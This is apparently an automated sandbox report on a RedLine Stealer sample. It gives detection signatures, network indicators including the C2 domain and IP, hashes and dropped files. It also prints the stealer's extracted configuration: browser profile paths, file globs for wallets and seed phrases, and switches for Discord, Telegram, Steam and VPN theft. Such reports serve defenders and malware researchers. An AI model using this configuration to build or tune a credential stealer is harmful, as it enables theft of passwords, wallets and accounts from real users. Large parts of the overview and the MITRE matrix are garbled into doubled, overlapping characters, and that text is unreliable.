ID: 440389 Sample Name: 3jdkEgyWkk Cookbook: default.jbs Time: 09:34:02 Date: 25/06/2021 Version: 32.0.0 Black Diamond Table of Contents

Table of Contents 2 Windows Analysis Report 3jdkEgyWkk 4 Overview 4 General Information 4 Detection 4 Signatures 4 Classification 4 Process Tree 4 Malware Configuration 4 Threatname: RedLine 4 Yara Overview 5 Initial Sample 5 Memory Dumps 5 Unpacked PEs 6 Sigma Overview 6 Signature Overview 6 AV Detection: 6 Networking: 6 Data Obfuscation: 6 Malware Analysis System Evasion: 6 Stealing of Sensitive Information: 6 Remote Access Functionality: 6 Mitre Att&ck Matrix 6 Behavior Graph 7 Screenshots 7 Thumbnails 7 Antivirus, Machine Learning and Genetic Malware Detection 8 Initial Sample 8 Dropped Files 8 Unpacked PE Files 8 Domains 8 URLs 9 Domains and IPs 10 Contacted Domains 10 Contacted URLs 10 URLs from Memory and Binaries 10 Contacted IPs 10 Public 10 General Information 10 Simulations 11 Behavior and APIs 11 Joe Sandbox View / Context 11 IPs 11 Domains 11 ASN 11 JA3 Fingerprints 12 Dropped Files 12 Created / dropped Files 12 Static File Info 18 General 18 File Icon 18 Static PE Info 18 General 18 Authenticode Signature 19 Entrypoint Preview 19 Data Directories 19 Sections 19 Resources 19 Imports 19 Version Infos 19 Network Behavior 19 Snort IDS Alerts 19 Network Port Distribution 19 TCP Packets 19 UDP Packets 19 DNS Queries 19 DNS Answers 20 HTTP Request Dependency Graph 20 HTTP Packets 20 Code Manipulations 22 Statistics 22 System Behavior 22 Analysis Process: 3jdkEgyWkk.exe PID: 256 Parent PID: 5792 22 General 22 Copyright Joe Security LLC 2021 Page 2 of 23 File Activities 22 File Created 22 File Deleted 22 File Read 22 Registry Activities 22 Disassembly 22 Code Analysis 23

Copyright Joe Security LLC 2021 Page 3 of 23 Windows Analysis Report 3jdkEgyWkk

Overview

General Information Detection Signatures Classification

Sample 3jdkEgyWkk (renamed file Name: extension from none to FFoouunndd maalllwwaarrree ccoonnfffiiigguurrraatttiiioonn exe) MFouuullltttniii dAA VmV SaSlcwcaaannrnene ecrrr o ddneeftittgeeucctrttiiaiootnino ffnfoorrr ssuubbm… Analysis ID: 440389 YMYaaurrrlatai dAdeeVttte eScccttteaednd n RReeerd ddLLeiiintneeec StSiotttenea aflloleerrrr subm MD5: ca1a62feb278165… Ransomware Yara detected RedLine Stealer ..Y.NNaEEraTT dsseootuuerrrcctee dcc ooRddeeed cLcooinnnettta aSiiinntses a mleeerttthhoodd … Miner Spreading SHA1: 81464d4f737875e…

F.FNooEuunTnd ds mouaarncnyey scstotrridinnegg scs o rreneltlaatitenedsd mttooe CCthrryoypdpt t mmaallliiiccciiioouusss Found many strings related to Crypt… malicious SHA256: f7b9325ac03957e… FFoouunndd maannyy ssttrriinnggss rreellaatteedd ttoo CCrryypptt… Evader Phishing

sssuusssppiiiccciiioouusss

suspicious Tags: 32 exe trojan PFPeoerurrfffnoodrrrm mssa DDnNyN SsSt rqqinuugeesrrrii ieeress l atttoote ddoo tmo aaCiiinnryssp wwt …

cccllleeaann

clean Infos: QPeuureefrorriiieremss s ss eDennNssSiiitttii ivvqeeu eddriiisisekks i iintnofffo odrrrmomaatattiiioionnns ( ((wvv… Exploiter Banker

Most interesting Screenshot: TQTrrruiiieessr i tettoos hhsaaerrrnvvseeistsitvtt aean ndddis sskttt eeinaafllol bbrmrrrooawwtsisoeenrrr (iiinvn…

Spyware Trojan / Bot RedLine ATAVrVie ppsrr rotoocc ehesasssr v ssetttrsrriiitnn aggnss d fffo osuutennaddl (((boorfffottteewnns ueusrs eien… Adware

Score: 84 BABiiVinn aaprrrryyo ccoeonsnstttaa siiinntrssin aag ss uufosspupiniiccdiiioo (uuossf t tettiiimn eue s ssettt… Range: 0 - 100 CBCoionnnatttraayiiin ncsso lnllootnangign ssl lleaee esppusss (p((>>ic==i o 33u ms tiiininm)))e st Whitelisted: false DCDeoettnteetcacttitenedsd plpooontttgee nnstttliieiaaelll pccrsrryy (pp>ttto=o f3ffuu nmnccitnttiiio)onn Confidence: 100% EDEnenataebbcllleteessd dd peeobbtuueggn tppiarrriiliv vciiillrleeyggpeetoss function

FEFonouaunbndlde asa hdhieiiggbhhu ngnu upmribvbeielerrr g ooefff s Wiiinnddooww /// UUss… Process Tree HFHoTTuTTnPPd G aE EhTTig ohorr r n PPuOmSSbTTe r ww oiiittfth hWoouuinttt d aao uwuss e/e rrUr …s IIHInnTttteeTrrrnPne eGttt PEPrTrroo voviiridd PeerOrr ssSeeTee nnw iiintnh cocouontn nane euccstttiieioornn …

System is w10x64 MInataeyyr nssellleete ePppr o(((evevivdaaessriii vvsee ellloonoo pipnss )c)) otttoon nhheiiinncddtieoerrnr … 3jdkEgyWkk.exe (PID: 256 cmdline: 'C:\Users\user\Desktop\3jdkEgyWkk.exe' MD5: CA1A62FEB27816580DB61309AB443A61) PMPEEa y /// OslLeLEeEp fff iii(lllee v hhaaasssiv aaenn l o iiinnovvpaaslll)iiid dt o cc eherrirtnttiiiffdfiiicecaar tttee cleanup PPEE ff/fii illOlee L ccEoon nftittlaaeiii nnhssa sst ttrarraannn iggneev a rrreleidsso ocuuerrrrccteiefisscate

QPEuue efrirrliiiee ssc ottthhneeta vvinoosllluu smtreea niiinngfffoeor rrrmeasaotttiiiouonrnc (e((nnsaam…

SQSaaumerppielllees eethxxee ccvuuotttliiiuoomnn esst ttoionppfoss r wmwhhaiiitllleieo npp rrr(oonccaeem…

Malware Configuration SSaampplllee ffefiiillxleee iicissu ddtiiioiffffffnee rrrseetnonttpt ttsthh awannh ioloerrri iigpgiirinnoaacllel …

USUsasemessp 3l3e22 bfbiiliitett P PisEE d fffiiiflllefeessrent than original Threatname: RedLine YUYasarreraas dd3ee2tttbeeicct tttPeedEd CCfilrrreeesddeenntttiiiaalll SSttteeaallleerrr

Yara detected Credential Stealer

Copyright Joe Security LLC 2021 Page 4 of 23 { "BlockedCountry": [], "BlockedIP": [], "ScanBrowsers": "true", "ScanChromeBrowsersPaths": [ "%USERPROFILE%\\AppData\\Local\\Battle.net", "%USERPROFILE%\\AppData\\Local\\Chromium\\User Data", "%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User Data", "%USERPROFILE%\\AppData\\Local\\Google(x86)\\Chrome\\User Data", "%USERPROFILE%\\AppData\\Roaming\\Opera Software\\", "%USERPROFILE%\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", "%USERPROFILE%\\AppData\\Local\\Iridium\\User Data", "%USERPROFILE%\\AppData\\Local\\7Star\\7Star\\User Data", "%USERPROFILE%\\AppData\\Local\\CentBrowser\\User Data", "%USERPROFILE%\\AppData\\Local\\Chedot\\User Data", "%USERPROFILE%\\AppData\\Local\\Vivaldi\\User Data", "%USERPROFILE%\\AppData\\Local\\Kometa\\User Data", "%USERPROFILE%\\AppData\\Local\\Elements Browser\\User Data", "%USERPROFILE%\\AppData\\Local\\Epic Privacy Browser\\User Data", "%USERPROFILE%\\AppData\\Local\\uCozMedia\\Uran\\User Data", "%USERPROFILE%\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", "%USERPROFILE%\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", "%USERPROFILE%\\AppData\\Local\\Coowon\\Coowon\\User Data", "%USERPROFILE%\\AppData\\Local\\liebao\\User Data", "%USERPROFILE%\\AppData\\Local\\QIP Surf\\User Data", "%USERPROFILE%\\AppData\\Local\\Orbitum\\User Data", "%USERPROFILE%\\AppData\\Local\\Comodo\\Dragon\\User Data", "%USERPROFILE%\\AppData\\Local\\Amigo\\User\\User Data", "%USERPROFILE%\\AppData\\Local\\Torch\\User Data", "%USERPROFILE%\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", "%USERPROFILE%\\AppData\\Local\\Comodo\\User Data", "%USERPROFILE%\\AppData\\Local\\360Browser\\Browser\\User Data", "%USERPROFILE%\\AppData\\Local\\Maxthon3\\User Data", "%USERPROFILE%\\AppData\\Local\\K-Melon\\User Data", "%USERPROFILE%\\AppData\\Local\\Sputnik\\Sputnik\\User Data", "%USERPROFILE%\\AppData\\Local\\Nichrome\\User Data", "%USERPROFILE%\\AppData\\Local\\CocCoc\\Browser\\User Data", "%USERPROFILE%\\AppData\\Local\\Uran\\User Data", "%USERPROFILE%\\AppData\\Local\\Chromodo\\User Data", "%USERPROFILE%\\AppData\\Local\\Mail.Ru\\Atom\\User Data", "%USERPROFILE%\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", "%USERPROFILE%\\AppData\\Local\\Microsoft\\Edge\\User Data", "%USERPROFILE%\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", "%USERPROFILE%\\AppData\\Local\\Steam", "%USERPROFILE%\\AppData\\Local\\CryptoTab Browser\\User Data" ], "ScanDiscord": "true", "ScanFTP": "true", "ScanFiles": "true", "ScanFilesPaths": [ "%userprofile%\\Desktop|*.txt,*.doc*,*key*,*wallet*,*seed*|0", "%userprofile%\\Documents|*.txt,*.doc*,*key*,*wallet*,*seed*|0" ], "ScanGeckoBrowsersPaths": [ "%USERPROFILE%\\AppData\\Roaming\\Mozilla\\Firefox", "%USERPROFILE%\\AppData\\Roaming\\Waterfox", "%USERPROFILE%\\AppData\\Roaming\\K-Meleon", "%USERPROFILE%\\AppData\\Roaming\\Thunderbird", "%USERPROFILE%\\AppData\\Roaming\\Comodo\\IceDragon", "%USERPROFILE%\\AppData\\Roaming\\8pecxstudios\\Cyberfox", "%USERPROFILE%\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw", "%USERPROFILE%\\AppData\\Roaming\\Moonchild Productions\\Pale Moon" ], "ScanScreen": "true", "ScanSteam": "true", "ScanTelegram": "true", "ScanVPN": "true", "ScanWallets": "true" }

Yara Overview

Initial Sample

Source Rule Description Author Strings 3jdkEgyWkk.exe JoeSecurity_RedLine Yara detected Joe Security RedLine Stealer

Memory Dumps

Source Rule Description Author Strings

Copyright Joe Security LLC 2021 Page 5 of 23 Source Rule Description Author Strings Process Memory Space: 3jdkEgyWkk.exe PID: 256 JoeSecurity_RedLine Yara detected Joe Security RedLine Stealer Process Memory Space: 3jdkEgyWkk.exe PID: 256 JoeSecurity_CredentialSte Yara detected Joe Security aler Credential Stealer

Unpacked PEs

Source Rule Description Author Strings 0.2.3jdkEgyWkk.exe.230000.0.unpack JoeSecurity_RedLine Yara detected Joe Security RedLine Stealer 0.0.3jdkEgyWkk.exe.230000.0.unpack JoeSecurity_RedLine Yara detected Joe Security RedLine Stealer

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

AV Detection:

Found malware configuration

Multi AV Scanner detection for submitted file

Networking:

Performs DNS queries to domains with low reputation

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

Malware Analysis System Evasion:

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Remote Access Functionality:

Yara detected RedLine Stealer

Mitre Att&ck Matrix

Copyright Joe Security LLC 2021 Page 6 of 23 Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Valid Windows Path Process Disable or Modify OS Security Software Remote Archive Exfiltration Encrypted Eavesdrop on Accounts Management Interception Injection 1 Tools 1 Credential Discovery 1 1 1 Services Collected Over Other Channel 1 Insecure Instrumentation 1 1 Dumping 1 Data 1 1 Network Network Medium Communication Default Command and Boot or Boot or Virtualization/Sandbox LSASS Process Discovery 2 Remote Data from Exfiltration Non- Exploit SS7 to Accounts Scripting Logon Logon Evasion 1 2 1 Memory Desktop Local Over Application Redirect Phone Interpreter 2 Initialization Initialization Protocol System 2 Bluetooth Layer Calls/SMS Scripts Scripts Protocol 2 Domain At (Linux) Logon Script Logon Process Injection 1 Security Virtualization/Sandbox SMB/Windows Data from Automated Application Exploit SS7 to Accounts (Windows) Script Account Evasion 1 2 1 Admin Shares Network Exfiltration Layer Track Device (Windows) Manager Shared Protocol 2 Location Drive Local At (Windows) Logon Script Logon Deobfuscate/Decode NTDS Application Window Distributed Input Scheduled Protocol SIM Card Accounts (Mac) Script Files or Information 1 Discovery 1 Component Capture Transfer Impersonation Swap (Mac) Object Model Cloud Cron Network Network Software Packing 1 LSA Remote System SSH Keylogging Data Fallback Manipulate Accounts Logon Script Logon Secrets Discovery 1 Transfer Channels Device Script Size Limits Communication

Replication Launchd Rc.common Rc.common Timestomp 1 Cached System Information VNC GUI Input Exfiltration Multiband Jamming or Through Domain Discovery 1 1 3 Capture Over C2 Communication Denial of Removable Credentials Channel Service Media

Behavior Graph

Hide Legend Legend: Process Signature Behavior Graph Created File ID: 440389 Sample: 3jdkEgyWkk DNS/IP Info Startdate: 25/06/2021 Is Dropped Architecture: WINDOWS Score: 84 Is Windows Process

Number of created Registry Values

sozigylkal.xyz prda.aadg.msidentity.com Number of created Files Visual Basic started Delphi

Multi AV Scanner detection Yara detected RedLine Found malware configuration 3 other signatures for submitted file Stealer Java .Net C# or VB.NET

C, C++ or other language 3jdkEgyWkk.exe Is malicious

Internet 15 22

sozigylkal.xyz

212.80.219.75, 49723, 49733, 80 api.ip.sb SERVERIUS-ASNL Lithuania

Queries sensitive disk Tries to harvest and Performs DNS queries information (via WMI, steal browser information to domains with low Win32_DiskDrive, often (history, passwords, reputation done to detect virtual etc) machines)

Screenshots

Thumbnails

Copyright Joe Security LLC 2021 Page 7 of 23 This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source Detection Scanner Label Link 3jdkEgyWkk.exe 39% Virustotal Browse 3jdkEgyWkk.exe 41% ReversingLabs ByteCode- MSIL.Trojan.AgentTesla

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Copyright Joe Security LLC 2021 Page 8 of 23 Source Detection Scanner Label Link sozigylkal.xyz 1% Virustotal Browse api.ip.sb 0% Virustotal Browse

URLs

Source Detection Scanner Label Link service.r 0% URL Reputation safe service.r 0% URL Reputation safe service.r 0% URL Reputation safe service.r 0% URL Reputation safe ocsp.sectigo.com0 0% URL Reputation safe ocsp.sectigo.com0 0% URL Reputation safe ocsp.sectigo.com0 0% URL Reputation safe ocsp.sectigo.com0 0% URL Reputation safe tempuri.org/Endpoint/GetArguments 0% Virustotal Browse tempuri.org/Endpoint/GetArguments 0% Avira URL Cloud safe sozigylkal.xyzd 0% Avira URL Cloud safe https://d41.co 0% Avira URL Cloud safe https://postlnk.com/afu.php? 0% Avira URL Cloud safe zoneid=2579647&var=2579647&rid=wfxzsvAkbQDjdtH2xjZy_Q%3D%3D tempuri.org/ 0% Avira URL Cloud safe tempuri.org/Endpoint/VerifyUpdateResponse 0% Avira URL Cloud safe sozigylkal.xyz:80/ 0% Avira URL Cloud safe www.remote88.com:808/feii/ 0% Avira URL Cloud safe go.micros 0% URL Reputation safe go.micros 0% URL Reputation safe go.micros 0% URL Reputation safe tempuri.org/Endpoint/GetUpdates 0% Avira URL Cloud safe tempuri.org/Endpoint/VerifyScanRequest 0% Avira URL Cloud safe www.interoperabilitybridges.com/wmp-extension-for-chrome 0% URL Reputation safe www.interoperabilitybridges.com/wmp-extension-for-chrome 0% URL Reputation safe www.interoperabilitybridges.com/wmp-extension-for-chrome 0% URL Reputation safe https://sectigo.com/CPS0D 0% URL Reputation safe https://sectigo.com/CPS0D 0% URL Reputation safe https://sectigo.com/CPS0D 0% URL Reputation safe tempuri.org/Endpoint/VerifyUpdate 0% Avira URL Cloud safe tempuri.org/0 0% Avira URL Cloud safe support.a 0% URL Reputation safe support.a 0% URL Reputation safe support.a 0% URL Reputation safe https://bludwan.com/afu.php? 0% Avira URL Cloud safe zoneid=2974233&var=2974233&rid=wfxzsvAkbQDjdtH2xjZy_Q%253D%253D https://watchseriesmovie.online/movie/570670/the-invisible-man%22 0% Avira URL Cloud safe sozigylkal.xyz 0% Avira URL Cloud safe tempuri.org/Endpoint/VerifyScanRe 0% Avira URL Cloud safe schemas.datacontract.org/2004/07/ 0% URL Reputation safe schemas.datacontract.org/2004/07/ 0% URL Reputation safe schemas.datacontract.org/2004/07/ 0% URL Reputation safe https://api.ip.sb4 0% URL Reputation safe https://api.ip.sb4 0% URL Reputation safe https://api.ip.sb4 0% URL Reputation safe https://api.ip.sb/geoip%USERPEnvironmentROFILE% 0% URL Reputation safe https://api.ip.sb/geoip%USERPEnvironmentROFILE% 0% URL Reputation safe https://api.ip.sb/geoip%USERPEnvironmentROFILE% 0% URL Reputation safe https://helpx.ad 0% URL Reputation safe https://helpx.ad 0% URL Reputation safe https://helpx.ad 0% URL Reputation safe tempuri.org/Endpoint/GetUpd 0% Avira URL Cloud safe sozigylkal.xyz/ 0% Avira URL Cloud safe https://get.adob 0% URL Reputation safe https://get.adob 0% URL Reputation safe https://get.adob 0% URL Reputation safe tempuri.org/Endpoint/GetArgumentsResponse 0% Avira URL Cloud safe crl.sectigo.com/SectigoRSATimeStampingCA.crl0t 0% URL Reputation safe crl.sectigo.com/SectigoRSATimeStampingCA.crl0t 0% URL Reputation safe Copyright Joe Security LLC 2021 Page 9 of 23 Source Detection Scanner Label Link crl.sectigo.com/SectigoRSATimeStampingCA.crl0t 0% URL Reputation safe 10.223.5.145:8080 0% Avira URL Cloud safe crt.sectigo.com/SectigoRSATimeStampingCA.crt0# 0% URL Reputation safe crt.sectigo.com/SectigoRSATimeStampingCA.crt0# 0% URL Reputation safe crt.sectigo.com/SectigoRSATimeStampingCA.crt0# 0% URL Reputation safe https://icanhazip.com4https://wtfismyip.com/textBbot.whatismyipaddress.com/2http://checkip.dy 0% Avira URL Cloud safe forms.rea 0% URL Reputation safe forms.rea 0% URL Reputation safe forms.rea 0% URL Reputation safe tempuri.org/Endpoint/GetUpdatesResponse 0% Avira URL Cloud safe https://thebestvpndeals.com/best-vpn/ 0% Avira URL Cloud safe tempuri.org/Endpoint/VerifyScanRequestResponse 0% Avira URL Cloud safe

Domains and IPs

Contacted Domains

Name IP Active Malicious Antivirus Detection Reputation sozigylkal.xyz 212.80.219.75 true true 1%, Virustotal, Browse unknown api.ip.sb unknown unknown false 0%, Virustotal, Browse unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation sozigylkal.xyz/ false Avira URL Cloud: safe unknown

URLs from Memory and Binaries

Contacted IPs

Public

IP Domain Country Flag ASN ASN Name Malicious 212.80.219.75 sozigylkal.xyz Lithuania 50673 SERVERIUS-ASNL true

General Information

Joe Sandbox Version: 32.0.0 Black Diamond Analysis ID: 440389 Start date: 25.06.2021 Start time: 09:34:02 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 7m 43s Hypervisor based Inspection enabled: false Report type: light Sample file name: 3jdkEgyWkk (renamed file extension from none to exe) Cookbook file name: default.jbs Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes 11 analysed: Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0

Copyright Joe Security LLC 2021 Page 10 of 23 Technologies: HCA enabled EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: MAL Classification: mal84.troj.spyw.evad.winEXE@1/20@4/1 EGA Information: Failed HDC Information: Successful, ratio: 1.3% (good quality ratio 0.3%) Quality average: 16.9% Quality standard deviation: 33.8% HCA Information: Successful, ratio: 98% Number of executed functions: 0 Number of non-executed functions: 0 Cookbook Comments: Adjust boot time Enable AMSI Warnings: Show All

Simulations

Behavior and APIs

Time Type Description 09:35:25 API Interceptor 21x Sleep call for process: 3jdkEgyWkk.exe modified

Joe Sandbox View / Context

IPs

Match Associated Sample Name / URL SHA 256 Detection Link Context 212.80.219.75 setup_x86_x64_install.exe Get hash malicious Browse freepriva cytoolsfor you.xyz/do wnloads/to olspab2.exe

Domains

No context

ASN

Match Associated Sample Name / URL SHA 256 Detection Link Context SERVERIUS-ASNL G7uT84AieQ.exe Get hash malicious Browse 212.80.219.46 JQBIAqK18w.exe Get hash malicious Browse 212.80.219.46 IRmda9meX0.exe Get hash malicious Browse 212.80.219.46 setup_x86_x64_install.exe Get hash malicious Browse 212.80.219.75 BOYIKrgSO4.exe Get hash malicious Browse 212.80.219.46 ELx2QYnF3X.exe Get hash malicious Browse 212.80.219.46 setup_x86_x64_install.exe Get hash malicious Browse 212.80.219.75 yjO7jXU4o8.exe Get hash malicious Browse 212.80.219.75 m2jCdKcFHA.exe Get hash malicious Browse 212.80.219.75 hWA5p04FsO.exe Get hash malicious Browse 212.80.219.75 yevbZfdCqR.exe Get hash malicious Browse 212.80.219.75 document_06.21.2021.doc Get hash malicious Browse 45.67.231.44 document_06.21.2021.doc Get hash malicious Browse 45.67.231.44 xE2aoCI2oZ.exe Get hash malicious Browse 188.119.11 3.198 Trainer v 4.6.1.exe Get hash malicious Browse 188.119.11 2.128

Copyright Joe Security LLC 2021 Page 11 of 23 Match Associated Sample Name / URL SHA 256 Detection Link Context wJiS3S2vpO.exe Get hash malicious Browse 188.119.11 3.198 4AUzoTtfYq.exe Get hash malicious Browse 193.38.55.84 apbhJhZzn9.exe Get hash malicious Browse 45.67.231.194 E71969906E6F39A1D837DE69BC6CCD27B6820157 Get hash malicious Browse 193.38.54.196 912D5.exe SecuriteInfo.com.Variant.Bulz.498529.31996.exe Get hash malicious Browse 193.38.54.96

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\tmp2113.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 40960 Entropy (8bit): 0.792852251086831 Encrypted: false SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw MD5: 81DB1710BB13DA3343FC0DF9F00BE49F SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1 Malicious: false Reputation: high, very likely benign file Preview: SQLite format 3...... @ ...... C......

C:\Users\user\AppData\Local\Temp\tmp2114.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 40960 Entropy (8bit): 0.792852251086831 Encrypted: false SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw MD5: 81DB1710BB13DA3343FC0DF9F00BE49F SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1 Malicious: false Reputation: high, very likely benign file Preview: SQLite format 3...... @ ...... C......

C:\Users\user\AppData\Local\Temp\tmp5BAD.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 40960 Entropy (8bit): 0.792852251086831 Encrypted: false Copyright Joe Security LLC 2021 Page 12 of 23 C:\Users\user\AppData\Local\Temp\tmp5BAD.tmp SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw MD5: 81DB1710BB13DA3343FC0DF9F00BE49F SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1 Malicious: false Reputation: high, very likely benign file Preview: SQLite format 3...... @ ...... C......

C:\Users\user\AppData\Local\Temp\tmp5BDD.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 40960 Entropy (8bit): 0.792852251086831 Encrypted: false SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw MD5: 81DB1710BB13DA3343FC0DF9F00BE49F SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1 Malicious: false Reputation: high, very likely benign file Preview: SQLite format 3...... @ ...... C......

C:\Users\user\AppData\Local\Temp\tmp5BDE.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 40960 Entropy (8bit): 0.792852251086831 Encrypted: false SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw MD5: 81DB1710BB13DA3343FC0DF9F00BE49F SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1 Malicious: false Reputation: high, very likely benign file Preview: SQLite format 3...... @ ...... C......

C:\Users\user\AppData\Local\Temp\tmp5BDF.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 40960 Entropy (8bit): 0.792852251086831 Encrypted: false SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw MD5: 81DB1710BB13DA3343FC0DF9F00BE49F SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1 Malicious: false Reputation: high, very likely benign file

Copyright Joe Security LLC 2021 Page 13 of 23 C:\Users\user\AppData\Local\Temp\tmp5BDF.tmp Preview: SQLite format 3...... @ ...... C......

C:\Users\user\AppData\Local\Temp\tmp963A.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 20480 Entropy (8bit): 0.6970840431455908 Encrypted: false SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0 MD5: 00681D89EDDB6AD25E6F4BD2E66C61C6 SHA1: 14B2FBFB460816155190377BBC66AB5D2A15F7AB SHA-256: 8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85 SHA-512: 159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3 Malicious: false Reputation: high, very likely benign file Preview: SQLite format 3...... @ ...... C...... g... .8......

C:\Users\user\AppData\Local\Temp\tmp963B.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 20480 Entropy (8bit): 0.6970840431455908 Encrypted: false SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0 MD5: 00681D89EDDB6AD25E6F4BD2E66C61C6 SHA1: 14B2FBFB460816155190377BBC66AB5D2A15F7AB SHA-256: 8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85 SHA-512: 159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3 Malicious: false Preview: SQLite format 3...... @ ...... C...... g... .8......

